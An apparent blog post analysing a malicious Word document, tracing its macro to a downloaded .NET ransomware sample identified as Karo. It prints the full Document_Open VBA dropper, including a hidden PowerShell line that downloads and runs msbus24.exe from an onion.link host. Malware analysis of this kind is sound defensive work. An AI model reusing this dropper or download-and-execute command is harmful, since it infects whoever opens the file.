Skip to main content

Analysis: Word.efe972d0d2f73fc51813889b756f2660840a4ccf2c783688a31c2eb9e2052b3b

An analysis of a malicious Word document found using VirusTotal Intelligence!

Well, first things first, the damn document has been password protected. Getting around that was a bit of a headache, but worth it. Anyway.

This is the malicious script which was hiding behind the password

Private Sub Document_Open()

    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile(Environ("temp") + "\test.bat", True)
    
    a.WriteLine ("@echo off")
    a.WriteLine ("set num=0")
    a.WriteLine (":checkexist")
    a.WriteLine ("IF NOT EXIST " + Environ("temp") + "\msbus24.exe if %num% LEQ 20 (")
    a.WriteLine (UserForm1.Label1.Caption)
    a.WriteLine ("TIMEOUT /t 20 /nobreak")
    a.WriteLine ("set /a num+=1")
    a.WriteLine ("GOTO checkexist )")
    a.WriteLine (":zipexist")
    a.Close
    
    Shell Environ("temp") + "\test.bat", vbHide
    
End Sub

UserForm1.Label1.Caption looks like this:

So the ‘completed script’ looks as follows:

Private Sub Document_Open()

    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile(Environ("temp") + "\test.bat", True)
    
    a.WriteLine ("@echo off")
    a.WriteLine ("set num=0")
    a.WriteLine (":checkexist")
    a.WriteLine ("IF NOT EXIST " + Environ("temp") + "\msbus24.exe if %num% LEQ 20 (")
    a.WriteLine ("powershell.exe -w hidden "(New-Object System.Net.WebClient).DownloadFile('http://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','%TEMP%\msbus24.exe')" & %tmp%\msbus24.exe")
    a.WriteLine ("TIMEOUT /t 20 /nobreak")
    a.WriteLine ("set /a num+=1")
    a.WriteLine ("GOTO checkexist )")
    a.WriteLine (":zipexist")
    a.Close
    
    Shell Environ("temp") + "\test.bat", vbHide
    
End Sub

So the malicious script creates a batch file, which downloads a file from http://fbbkvm7ezghq4dx3.onion.link and then executes the downloaded file.

Let’s dig into msbus24.exe. The file is a .NET binary so it’s time to dig out DnSpy!

The file was obfuscated using SmartAssembly – which is nice and easy to deobfuscate thankfully!

$ de4dot msbus24.exe

de4dot v3.1.41592.3405 Copyright (C) 2011-2015 [email protected]
Latest version and source code: https://github.com/0xd4d/de4dot

Detected SmartAssembly 6.8.0.121 (C:\msbus24.exe)
Cleaning C:\msbus24.exe
Renaming all obfuscated symbols
Saving C:\msbus24-cleaned.exe

The entry point is: ns0.Class2.Main so I’m going to start there.

An initial assumption is that this malware is still in early development, or is it a ‘Malware-as-a-Service’ type of deal because of little things like this: Mutex mutex = new Mutex(false, "MyUniqueMutexName");

The malware has the namespace of: namespace karo, so this is a strain of ransomware that has already been documented – based on EDA2 🙂

References

VirusTotal

Original Document - https://www.virustotal.com/en/file/efe972d0d2f73fc51813889b756f2660840a4ccf2c783688a31c2eb9e2052b3b/analysis/

msbus24.exe - https://www.virustotal.com/file/48d3a79c6b83b6e45d1f217782ff35c9488d189392798b955cb3a946a650143f/analysis/

Tools

  1. DnSpy
  2. De4Dot